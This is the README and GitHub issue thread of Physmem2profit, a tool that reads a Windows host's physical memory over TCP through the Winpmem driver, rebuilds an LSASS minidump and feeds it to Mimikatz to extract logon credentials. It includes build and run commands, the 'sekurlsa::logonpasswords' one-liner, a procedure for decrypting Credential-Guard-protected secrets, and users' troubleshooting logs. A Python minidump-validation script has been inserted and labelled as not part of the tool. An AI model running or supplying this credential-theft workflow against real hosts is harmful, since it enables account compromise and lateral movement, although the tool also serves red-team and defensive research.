
Physmem2profit

Physmem2profit can be used to create a minidump of a target host's LSASS process by analysing physical memory remotely. The intention of this research is to propose an alternative approach to credential theft and create a modular framework that can be extended to support other drivers that can access physical memory. Physmem2profit generates a minidump (.dmp) of LSASS that can be further analyzed with Mimikatz. The tool does not require Cobalt Strike but should work fine over beacon with a SOCKS proxy.

The idea is illustrated below:

[Figure: Overview of Physmem2profit]

The tool has two components:

  1. The C# server component, physmem2profit.exe, executed on the target host
    • Loads the Winpmem driver and acts as a server, which exposes the physical RAM of the target host through a TCP port
  2. The client, physmem2profit Python module, executed on the attacking machine
    • When executed with --mode mount, connects to the target machine and mounts the physical RAM of the target as a raw file with the help of FUSE
    • When executed with --mode dump, calls various Rekall plugins to analyze the memory image and to generate a minidump of the LSASS process.
    • When executed with --mode all, performs both of the above actions. The connection to the server is closed when the dump is complete.

Installation Instructions

  1. Clone the Physmem2profit Git repository: git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git
  2. For the server running on the target computer:
    1. Build physmem2profit/server/Physmem2profit.sln with Visual Studio
  3. For the client running on the attacking machine:
    1. bash physmem2profit/client/install.sh

Usage

  1. Run physmem2profit.exe [--ip IP] [-p PORT] [--hidden] [--verbose] on the target as admin.
    • You can download the signed Winpmem driver here. This driver needs to be present on the target host.
  2. Run source physmem2profit/client/.env/bin/activate on the attacking machine. This command will activate the virtualenv created by install.sh.
  3. Run cd physmem2profit/client and python3 physmem2profit --host HOST [--port PORT] [--mode MODE] [--driver DRIVER] [--install DRIVER_PATH_ON_TARGET] [--label LABEL_FOR_MEMORY_DUMP] on the attacking machine.
    • physmem2profit.exe needs to be running on the target machine before you run this command.
    • This will write the LSASS minidump to output/[label]-[date]-lsass.dmp on the attacking machine.
  4. Copy the minidump to a Windows system and run mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"
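Before moving a dump to a Windows system it is worth checking that the file is a structurally complete minidump: a header carrying the 'MDMP' signature and a stream directory that includes the system info, module info and memory info streams the client reports collecting in step 3. The parser below is an added example, not part of physmem2profit; the stream type numbers come from the public MINIDUMP_STREAM_TYPE enumeration and the fixture dumps it builds are constructed in memory.

```python
"""Sanity-check a minidump header and stream directory (added example, not part
of physmem2profit). Stream type numbers follow the public MINIDUMP_STREAM_TYPE
enumeration in dbghelp.h."""
import struct

MDMP_SIGNATURE = 0x504D444D   # the ASCII bytes 'MDMP' read as little-endian u32
MINIDUMP_VERSION = 0xA793     # low 16 bits of MINIDUMP_HEADER.Version
# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva,
# CheckSum, TimeDateStamp, Flags (u64) -> 32 bytes, no padding.
HEADER_FMT = "<IIIIIIQ"
# MINIDUMP_DIRECTORY: StreamType, Location.DataSize, Location.Rva -> 12 bytes.
DIR_FMT = "<III"
STREAM_NAMES = {
    0: "UnusedStream", 3: "ThreadListStream", 4: "ModuleListStream",
    5: "MemoryListStream", 7: "SystemInfoStream", 9: "Memory64ListStream",
    15: "MiscInfoStream",
}
# The three streams the physmem2profit client says it collects; a minidump-based
# credential parser needs them to find LSASS modules and read their memory.
REQUIRED = {7: "system info", 4: "module info", 9: "memory info and content"}


def parse_directory(blob):
    """Return [(stream_type, data_size, rva)] or raise ValueError if malformed."""
    hdr_len, dir_len = struct.calcsize(HEADER_FMT), struct.calcsize(DIR_FMT)
    if len(blob) < hdr_len:
        raise ValueError("file shorter than MINIDUMP_HEADER")
    sig, version, n_streams, dir_rva, _csum, _ts, _flags = struct.unpack_from(HEADER_FMT, blob, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError("bad signature 0x%08x (expected 'MDMP')" % sig)
    if (version & 0xFFFF) != MINIDUMP_VERSION:
        raise ValueError("unexpected minidump version 0x%04x" % (version & 0xFFFF))
    entries = []
    for i in range(n_streams):
        off = dir_rva + i * dir_len
        if off + dir_len > len(blob):
            raise ValueError("stream directory entry %d lies outside the file" % i)
        stype, size, rva = struct.unpack_from(DIR_FMT, blob, off)
        # UnusedStream entries are legitimately empty; every other stream must fit in the file.
        if stype != 0 and rva + size > len(blob):
            raise ValueError("%s points past end of file" % STREAM_NAMES.get(stype, stype))
        entries.append((stype, size, rva))
    return entries


def missing_streams(entries):
    """Names of the required streams that are absent from a parsed directory."""
    present = {stype for stype, _size, _rva in entries}
    return [REQUIRED[t] for t in sorted(REQUIRED) if t not in present]


def build_minidump(stream_types):
    """Constructed fixture: header + directory, each stream holding 16 zero bytes."""
    hdr_len = struct.calcsize(HEADER_FMT)
    dir_len = struct.calcsize(DIR_FMT) * len(stream_types)
    directory, body = bytearray(), bytearray()
    for stype in stream_types:
        directory += struct.pack(DIR_FMT, stype, 16, hdr_len + dir_len + len(body))
        body += b"\x00" * 16
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, MINIDUMP_VERSION,
                         len(stream_types), hdr_len, 0, 0, 0)
    return bytes(header + directory + body)


def check_file(path):
    """Report which required streams a minidump on disk lacks (empty list = complete)."""
    with open(path, "rb") as f:
        return missing_streams(parse_directory(f.read()))


if __name__ == "__main__":
    print("complete dump missing:", missing_streams(parse_directory(build_minidump([7, 4, 9, 3]))))
    print("dump without module list missing:", missing_streams(parse_directory(build_minidump([7, 9]))))
```

Run check_file() against output/[label]-[date]-lsass.dmp; a non-empty result means the dump cannot work in a credential parser regardless of its contents, while an empty result only confirms the container is complete.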

Credential Guard

Decrypting credentials protected by Credential Guard requires gaining access to the encryption key that is stored in the Secure World. For testing purposes, Physmem2profit supports retrieving data from the Secure World from VMware Fusion/Workstation snapshots (.vmem files). This allows credentials protected by Credential Guard to be decrypted with the help of Mimikatz.

Setting up a virtual machine for testing

  1. Create a Windows 10 virtual machine with VMware Fusion/Workstation. Join the virtual machine to a domain (Credential Guard does not protect local accounts).
  2. In the Advanced settings, enable VBS (Virtualization Based Security).
  3. Deploy Credential Guard. An easy option is to use the Device Guard and Credential Guard hardware readiness tool.
  4. Reboot.
  5. Run msinfo32 and check that "Virtualization-based security Services Running" lists "Credential Guard".

Testing

  1. Log in to the virtual machine (with a domain account)
  2. Take a snapshot
  3. Run Physmem2profit against the .vmem file: python3 physmem2profit --mode dump --vmem /tmp/Win10-Snapshot1.vmem --label credential-guard-test
    • This will write the LSASS minidump to output/[label]-[date]-lsass.dmp. The minidump contains a special stream that holds the data from the Secure World, allowing Mimikatz to locate the encryption key.
    • The Secure World data is also stored to output/[label]-[date]-secure-world.raw.
    • If Rekall has problems parsing the .vmem file, Physmem2profit will recommend copying the .vmsn file and renaming it to .vmss.
  4. Copy the minidump to a Windows system and run mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"

Future work

Support for bypassing Credential Guard by exploiting the S3 Resume firmware vulnerability, demonstrated in our Disobey talk, is coming soon :).

More Information

Rethinking Credential Theft: a blog post explaining why this approach to credential theft was chosen.

Physmem2profit is developed by @b3arr0 and @TimoHirvonen.

Kudos for contributing:

  • Janusz Szmigielski for refactoring the code for the first release
  • Pawel Kurowski for refactoring the code for the first release
  • Grzegorz Rychlik for refactoring the code for the first release


physmem2profit's Issues

[feature-request] Add an option to unload the driver after dump

Hello and thanks for the great tool. I could use it successfully. But, in the current state, there is no option to unload the driver after the dump is done. I think it would be a great feature to ensure a target can be quickly cleaned.

On a side note, the reconstruction of a minidump by Rekall seems rather unstable, as many dumps performed on various versions of Windows 10 were not parsable by mimikatz or even pypykatz. But doing multiple dumps on the same target can yield success, from the tests I have performed.

Windows 10 dumps

I've attempted to dump against several Windows 10 systems, each time running the client several times to ensure multiple dumps (as suggested in issue #3). Additionally I have cleared the rekall cache as suggested. I'm still unable to get a minidump from Windows 10 that I can successfully read in mimikatz. Any suggestions?

Compiled the server portion on Microsoft Windows [Version 10.0.18363.752] Visual Studio Community 2019 version 16.3.9.

Ran on Microsoft Windows [Version 10.0.17763.1098] with:

Physmem2profit.exe --ip 1.2.3.4

Client running on Kali - Run with:

python3 physmem2profit --host 1.2.3.4 --port 8080 --mode all --driver winpmem --install att_winpmem_64.sys --label balls
[*] Connecting to 1.2.3.4 on port 8080
[*] Connected
[*] Loading config from config.json
[*] Driver installed
[*] Wrote config to config.json
[*] Exposing the physical memory as a file
[*] Analyzing physical memory
[*] Finding LSASS process
[*] LSASS found
[*] Checking for Credential Guard...
[*] No Credential Guard detected
[*] Collecting data for minidump: system info
[*] Collecting data for minidump: module info
[*] Collecting data for minidump: memory info and content
[*] Generating the minidump file
[*] Wrote LSASS minidump to output/balls-2020-04-08-lsass.dmp

Attempting to grab the credentials with mimikatz:

  .#####.   mimikatz 2.2.0 (x64) #18362 Mar  8 2020 13:32:41
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::minidump balls-2020-04-08-lsass.dmp
Switch to MINIDUMP : 'balls-2020-04-08-lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'balls-2020-04-08-lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

Cheers

Error during the compilation of the client

During the compilation of the client I have the following error:

x86_64-linux-gnu-gcc -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -g -fwrapv -O2 -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -DBLAKE2_COMPRESS_SSE2=1 -I/opt/physmem2profit/client/.env/include -I/usr/include/python3.10 -c impl/blake2b.c -o build/temp.linux-x86_64-3.10/impl/blake2b.o
In file included from impl/blake2b.c:18:
impl/blake2.h:101:5: error: size of array element is not a multiple of its alignment
101 | blake2s_state S[8][1];
| ^~~~~~~~~~~~~
impl/blake2.h:102:5: error: size of array element is not a multiple of its alignment
102 | blake2s_state R[1];
| ^~~~~~~~~~~~~
impl/blake2.h:109:5: error: size of array element is not a multiple of its alignment
109 | blake2b_state S[4][1];
| ^~~~~~~~~~~~~
impl/blake2.h:110:5: error: size of array element is not a multiple of its alignment
110 | blake2b_state R[1];
| ^~~~~~~~~~~~~
impl/blake2b.c: In function ‘blake2b’:
impl/blake2b.c:293:3: error: size of array element is not a multiple of its alignment
293 | blake2b_state S[1];
| ^~~~~~~~~~~~~
impl/blake2b.c: At top level:
impl/blake2b.c:29:22: warning: ‘blake2b_sigma’ defined but not used [-Wunused-const-variable=]
29 | static const uint8_t blake2b_sigma[12][16] =
| ^~~~~~~~~~~~~
error: command '/usr/bin/x86_64-linux-gnu-gcc' failed with exit code 1
[end of output]

note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure

× Encountered error while trying to install package.
╰─> pyblake2

Service Failed to start. 31: A device attached to the system is not functioning

I seem to be having issues with the physmem2profit service on my bare-metal Windows 10 host. Any suggestions?

Compiled with Microsoft Visual Studio Community 2019 version 16.5.5

Ran on Microsoft Windows Version 10 2004 update:
.\Physmem2profit.exe --ip 192.168.128.142 -p 80 --verbose

Attacking machine command:
python3 physmem2profit --host 192.168.128.142 --port 80 --mode all --driver winpmem --install c:/temp/att_winpmem_64.sys --label foobar

Receiving the following output from the Windows 10 host after attacking with my Kali machine:

[+] Found driver bridge: WinPmem.
[+] Registered command: Install.  
[+] Registered command: Uninstall.  
[+] Registered command: Map.
[+] Registered command: Read.
[*] Starting server on 192.168.128.142:21...
[+] Server Started.
[*] Waiting for a connection...
[+] Connected!
[*] Invoking Command Install for driver WinPmem.
[*] Installing service...
[*] Creating service physmem2profit...
[+] Service created successfully.
[*] Starting service...
[*] Service is stopped. Trying to start it...
[-] Service Failed to start. 31: A device attached to the system is not functioning
[*] Invoking Command Uninstall for driver WinPmem.
[?] Service already stopped.
[+] Successfully unloaded the WinPMem driver.
[*] Exit command received. Terminating.

Mimikatz or pypykatz are not able to parse lsass.DMP

After a dump of lsass, mimikatz or pypykatz are not able to parse the result

mimikatz # sekurlsa::minidump 123.dmp
Switch to MINIDUMP : '123.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : '123.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

mimikatz #

Driver file does not exist.

I got a weird issue on the client:

[root:...ysmem/physmem2profit/client]# python3 physmem2profit --mode all --host 192.168.17.162 --port 8081 --driver winpmem --install C:\Users\att_winpmem_64.sys --label dg-gdsf
[*] Connecting to 192.168.17.162 on port 8081
[*] Connected
[*] Loading config from config.json
Process Process-1:
Traceback (most recent call last):
  File "/usr/lib/python3.7/multiprocessing/process.py", line 297, in _bootstrap
    self.run()
  File "/usr/lib/python3.7/multiprocessing/process.py", line 99, in run
    self._target(*self._args, **self._kwargs)
  File "physmem2profit/__main__.py", line 57, in <lambda>
    jobs.append(Process(target=lambda: mount.mount(socket, args.driver, args.install))) # mount will block thread, it need to be handled by child process.
  File "physmem2profit/mount.py", line 351, in mount
    fuse = FUSE(Physmem(sock, mountpoint, driver, installArguments), mountpoint, nothreads=True, foreground=True)
  File "physmem2profit/mount.py", line 46, in __init__
    raise Exception(struct.unpack("<%ds" % response, self.socket.recv(response))[0].decode('utf-8'))
Exception: Driver file does not exist.
[*] Read 0 MB, cached reads 0 MB
Process Process-2:
Traceback (most recent call last):
  File "/usr/lib/python3.7/multiprocessing/process.py", line 297, in _bootstrap
    self.run()
  File "/usr/lib/python3.7/multiprocessing/process.py", line 99, in run
    self._target(*self._args, **self._kwargs)
  File "physmem2profit/__main__.py", line 59, in <lambda>
    jobs.append(Process(target=lambda: physmem2minidump.dump(args.label)))
  File "physmem2profit/physmem2minidump.py", line 144, in dump
    ensureFileExist(CONFIG_FILE)
  File "physmem2profit/physmem2minidump.py", line 134, in ensureFileExist
    raise Exception('File does not exist: ' + path)
Exception: File does not exist: config.json
[root:...ysmem/physmem2profit/client]#

Then on server,

[*] Registering driver bridges.
[+] Found driver bridge: WinPmem.
[+] Registered command: Install.
[+] Registered command: Uninstall.
[+] Registered command: Map.
[+] Registered command: Read.
[*] Starting server on 192.168.17.162:8081...
[+] Server Started.
[*] Waiting for a connection...
[+] Connected!
[*] Installing service...
[*] Creating service physmem2profit...
[-] Driver file does not exist.

though I downloaded the driver and placed it in the same folder.

Visual Studio 2019 is required to build.

Not an issue and I'll be closing this immediately. I just wanted to provide some documentation for how to build the physmem2profit server solution in case others run into similar errors building this.

If you're getting syntax errors when trying to build this project as-is, you're likely not using the correct version of Visual Studio or the .NET Framework. Here's how to build this solution.

  1. Download Visual Studio 2019 Community from here.

  2. Run the installer. When choosing add-ons for the installation, select ".NET Desktop Environment".

  3. You should be okay to build the solution now. Make sure you select the "Release" tag too.

Thanks for making this tool!

File does not exist: config.json

Unfortunately, I haven't used rekall before, so I couldn't solve the issue below.
The "dump" function has a config.json file which seems to be necessary to dump the remote physical memory.

    CONFIG_FILE = 'config.json'
    print("[*] Loading config from %s" % (CONFIG_FILE))
    ensureFileExist(CONFIG_FILE)
    with open(CONFIG_FILE) as f:
        config = json.load(f)

and because it doesn't exist, "ensureFileExist()" crashes.

============= output on the client ============
[*] Connecting to 192.168.43.209 on port 8080
[*] Connected
[*] Loading config from config.json
Process Process-1:
Traceback (most recent call last):
  File "/usr/lib/python3.7/multiprocessing/process.py", line 297, in _bootstrap
    self.run()
  File "/usr/lib/python3.7/multiprocessing/process.py", line 99, in run
    self._target(*self._args, **self._kwargs)
  File "__main__.py", line 57, in <lambda>
    jobs.append(Process(target=lambda: mount.mount(socket, args.driver, args.install))) # mount will block thread, it need to be handled by child process.
  File "/root/Desktop/test/physmem2profit/client/mount.py", line 351, in mount
    fuse = FUSE(Physmem(sock, mountpoint, driver, installArguments), mountpoint, nothreads=True, foreground=True)
  File "/root/Desktop/test/physmem2profit/client/mount.py", line 46, in __init__
    raise Exception(struct.unpack("<%ds" % response, self.socket.recv(response))[0].decode('utf-8'))
Exception: Driver file does not exist.
[*] Read 0 MB, cached reads 0 MB
Process Process-2:
Traceback (most recent call last):
  File "/usr/lib/python3.7/multiprocessing/process.py", line 297, in _bootstrap
    self.run()
  File "/usr/lib/python3.7/multiprocessing/process.py", line 99, in run
    self._target(*self._args, **self._kwargs)
  File "__main__.py", line 59, in <lambda>
    jobs.append(Process(target=lambda: physmem2minidump.dump(args.label)))
  File "/root/Desktop/test/physmem2profit/client/physmem2minidump.py", line 144, in dump
    ensureFileExist(CONFIG_FILE)
  File "/root/Desktop/test/physmem2profit/client/physmem2minidump.py", line 134, in ensureFileExist
    raise Exception('File does not exist: ' + path)
Exception: File does not exist: config.json

============================================

============ output on server =====================

[*] Registering driver bridges.
[+] Found driver bridge: WinPmem.
[+] Registered command: Install.
[+] Registered command: Uninstall.
[+] Registered command: Map.
[+] Registered command: Read.
[*] Starting server on 192.168.43.209:8080...
[+] Server Started.
[*] Waiting for a connection...
[+] Connected!
[*] Installing service...
[*] Creating service physmem2profit...
[-] Driver file does not exist.

Also, I don't know why the server can't find the driver (it does exist in the same directory).

Current state of things with rekall not being maintained anymore

Hello, I used this awesome tool multiple times and it worked wonderfully well.

I tried to use it again today but I could not install the required rekall dependencies; many errors are popping up and it does not seem easily fixable at first glance. I also saw that the project (rekall) was discontinued.

Do you know if a distribution can currently install the dependencies, or if there is any way to tweak the dependencies for the project to work?

Regards

[Thought share] Local client in a all-in-one package for a one-shot lsass dump

Hello there,

First of all, I wanna thank you for this awesome tool. I love the idea, and it works 90% of the time, life saver. Great research.

And because it is awesome, I was thinking about a way to dump lsass locally using this tool. Since the physical memory is exposed as a file over TCP, I guess it wouldn't be that difficult to have a client in C# that would locally connect to the server and dump lsass on the target disk.

This way, there would be a single tool that would

  1. expose RAM on 127.0.0.1:<port>
  2. connect to that local port and dump lsass directly on the host

Do you think it is possible (theoretically) or am I missing something?

I'm not asking you to actually develop this, it's more of a thought-sharing process: is it possible, is there something I forgot, what do you think about it, ...

Again, thank you!
